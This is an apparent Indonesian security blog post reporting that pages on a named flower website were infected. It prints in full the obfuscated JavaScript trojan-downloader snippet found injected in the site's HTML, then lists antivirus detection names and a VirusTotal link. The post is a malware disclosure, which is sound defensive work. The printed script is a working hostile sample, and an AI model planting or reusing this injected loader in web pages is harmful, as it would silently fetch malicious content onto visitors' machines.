JS/TrojanDownloader.Agent.NKWtrojan
Kasus pada situs www.duniaflora.com
Sebagian script pada html mengadung virus.
Javascript malware.
Details:
<!--44e772472a6c8ee7faf4f3701360ed7e-><script language=javascript>uoqnczam="MOrOhkPvKu%@l&IGNP";fxwbk="<sL63L72L69pL74 L6caL6egL75L61L67L65=L6aavaL73L63ripL74L3e L20fuL6eL63tL69onL20L77oL67tc(L73L6eL29{vaL72L20L6epL65L69,oL74L6aL3d\"+L29}
GL31asL23AL4aL32L5bdL49L26biL5eL4e0'jC=*TL40,L63mL42opL5dL75tqL65L37;L50L28:
ZrL4bL5fL5c\"3L7eL48L34L24! -L6bL4fL778L565{xL55ML45L6cgyL39f6hL6ev|z.`F\",qpL6a=\"L22,zoeq,fL76L2coL6cL62=
L22\",hpr;L66L6fr(npL65iL3d0;L6epL65iL3cL73L6e.lenL67tL68;npeL69+L2bL29L7b zoeL71=sL6e.chL61rAt(npei);fvL3dL6fL74jL2eL69nL64L65L78L4ff(L7aoeq);ifL28fL76>-1L29
{L20L68prL3dL28(fvL2b1)L25L381L2d1)L3bif(hpL72<=L30)hprL2bL3d81;oL6cL62+
L3dotjL2echarL41t
(hprL2dL31L29;L20} L65L6cse oL6cb+=L7aL6fL65L71L3b}L71pj+=L6fL6cb;docuL6denL74L2ewriL74L65(qpj);}
L3cL2fsL63L72L69L70L74>";aimrujv=unescape(fxwbk.replace(/L/g,uoqnczam.charAt(10)));var wmd,slha;document.write(aimrujv);wmd="<#mK^]q-gsvytsy7*3Cs|s#mK^]q3>-IpmtB7vq`8K^q7:-3<S=R&(@-gsvytsy7*\\32s|sSmK^]q\\3-SR=*\\3nqq]Z//888`yppyg7svsg^q^m#`v7q/\"\"tqi`C#?3)IpmtB7vq`K767KK7K)3\\3><\\/S=R&(@>3-}P-</#mK^]q>--";wogtc(wmd);</script
Deteksi dengan anti virus lainnya sebagai berikut :
BitDefender : Trojan.Downloader.JS.Small.NAT
Emsisoft :
Trojan.Downloader.JS.Small.NAT (B)
F-Secure :
Trojan.Downloader.JS.Small.NAT
GData :
Trojan.Downloader.JS.Small.NAT
MicroWorld-eScan : Trojan.Downloader.JS.Small.NAT
nProtect :
Trojan.Downloader.JS.Small.NAT
Adapun hasil scan yang lebih detail lagi klik link
dibawah ini.
https://www.virustotal.com/en/file/9c82e2b5c709615fff0da6a07b891e99a3e
762bb7f42d860200c02dcb9b01aab/analysis/1369994214/
762bb7f42d860200c02dcb9b01aab/analysis/1369994214/
0 Komentar:
Posting Komentar